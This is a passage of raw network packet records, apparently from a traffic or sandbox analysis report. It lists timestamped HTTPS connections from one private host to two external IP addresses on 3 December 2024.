                                                                                                                      Dec 3, 2024 08:55:37.521708965 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.521738052 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.522733927 CET49993443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.522733927 CET49993443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.522768021 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.528645039 CET49994443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.528656006 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.529062986 CET49994443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.529062986 CET49994443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.529082060 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.539084911 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.539093971 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.539182901 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.550872087 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.550899029 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.550904989 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.552011013 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.552089930 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.552181959 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.552191019 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.568798065 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.572647095 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.588572025 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.588675976 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.593698025 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.593719006 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.596648932 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.602766037 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.602844000 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.602863073 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.604231119 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.604286909 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.605446100 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.605446100 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.605463028 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.605746984 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.649266958 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.649288893 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.649295092 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.652662039 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.652683973 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.700890064 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.728652954 CET49970443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.728672981 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.790246964 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.790338993 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.790352106 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.790385962 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.790389061 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.790395975 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.790426970 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.790467978 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.790518999 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.792614937 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.799098015 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.799195051 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.817642927 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.819546938 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.831885099 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.832096100 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.845989943 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.846081972 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.864475965 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.866072893 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.878561020 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.880661964 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.892708063 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.892831087 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.900074005 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.900087118 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.900118113 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.900244951 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.900244951 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.915399075 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.915406942 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.915649891 CET4434998313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.915692091 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.915721893 CET4434998313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.916158915 CET49983443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.921370983 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.921437979 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.921466112 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.921600103 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.923425913 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.923454046 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.923461914 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.923824072 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.923834085 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.923897982 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.923924923 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.924601078 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.928253889 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.928272009 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.935559988 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.935595036 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.936073065 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.936116934 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.936254025 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.937669039 CET49983443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.937670946 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.937680960 CET4434998313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.937680960 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.942080021 CET49996443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.942131042 CET4434999613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.942771912 CET49996443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.943522930 CET49996443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:37.943556070 CET4434999613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.944051981 CET49981443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.944058895 CET44349981196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.944453955 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.944477081 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.944586992 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.946518898 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.946526051 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.946538925 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.946551085 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.947843075 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.950911045 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.950923920 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.954274893 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.954288006 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.954412937 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.955379009 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.955389977 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.973628998 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.974242926 CET49985443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.974256039 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.974607944 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.977020025 CET49985443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:37.977082968 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:37.977266073 CET49985443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.023324013 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.037113905 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.037349939 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.037358999 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.037688971 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.038054943 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.038113117 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.038130999 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.042213917 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.042315960 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.048320055 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.048382998 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.060961008 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.061026096 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.070533991 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.070599079 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.070609093 CET4434998613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.071932077 CET49986443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:38.071955919 CET4434998613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.075124025 CET49986443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:38.075129986 CET4434998613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.079329967 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.080041885 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.080106974 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.089550972 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.092902899 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.092968941 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.103079081 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.103152990 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.111897945 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.111968994 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.121611118 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.121682882 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.134258986 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.134314060 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.134341955 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.143934011 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.143999100 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.154782057 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.154856920 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.164324045 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.164383888 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.174077988 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.174144983 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.243536949 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.243602037 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.248498917 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.248558044 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.248856068 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.248888016 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.248894930 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.248940945 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.248956919 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.254452944 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.254513979 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.292123079 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.297501087 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.297563076 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.300844908 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.300910950 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.304438114 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.304501057 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.308275938 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.308341026 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.311592102 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.311655998 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.315629005 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.315700054 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.318248987 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.318309069 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.322607994 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.322653055 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.325819016 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.325890064 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.329572916 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.329637051 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.333035946 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.333090067 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.336463928 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.336519957 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.340696096 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.340764999 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.394249916 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.394289017 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.394331932 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.445023060 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.445094109 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.445097923 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.445108891 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.445132017 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.445161104 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.445514917 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.445528030 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.446088076 CET50000443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.446146011 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.446213961 CET50000443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.447189093 CET50000443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.447201014 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.482784033 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.482793093 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.482870102 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.494637012 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.494645119 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.494723082 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.514116049 CET4434998613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.516834021 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.516840935 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.516921043 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.517905951 CET4434998613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.517962933 CET49986443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:38.517976046 CET4434998613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.518002033 CET4434998613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.518048048 CET49986443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:38.518086910 CET49986443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:38.518095016 CET4434998613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.518109083 CET49986443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:38.518114090 CET4434998613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.523096085 CET50001443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:38.523118973 CET4435000113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.523181915 CET50001443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:38.533819914 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.533828974 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.533898115 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.536225080 CET50001443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:38.536237001 CET4435000113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.735414982 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.735429049 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.735490084 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.745085001 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.745167971 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.745178938 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.745208979 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.751384020 CET49982443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.751403093 CET44349982196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.751832962 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.751867056 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.751920938 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.752968073 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.752978086 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.795991898 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.796036005 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.796097994 CET49985443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.796111107 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.799628019 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.799693108 CET49985443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.809621096 CET49985443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.809645891 CET44349985196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.885482073 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.885507107 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.885513067 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.885535955 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.885631084 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.885637045 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:38.925995111 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:38.962795019 CET4434998913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.003487110 CET49989443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.009207964 CET49989443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.009216070 CET4434998913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.012968063 CET49989443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.012976885 CET4434998913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.040761948 CET4434998813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.085906982 CET49988443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.085928917 CET4434998813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.086565971 CET49988443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.086575031 CET4434998813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.127784967 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.127796888 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.127914906 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.141486883 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.141494036 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.141561031 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.141586065 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.141633987 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.162364960 CET49984443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.162379026 CET44349984196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.162808895 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.162836075 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.162892103 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.163536072 CET50004443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.163543940 CET44350004196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.180128098 CET44349992196.22.142.143192.168.2.4
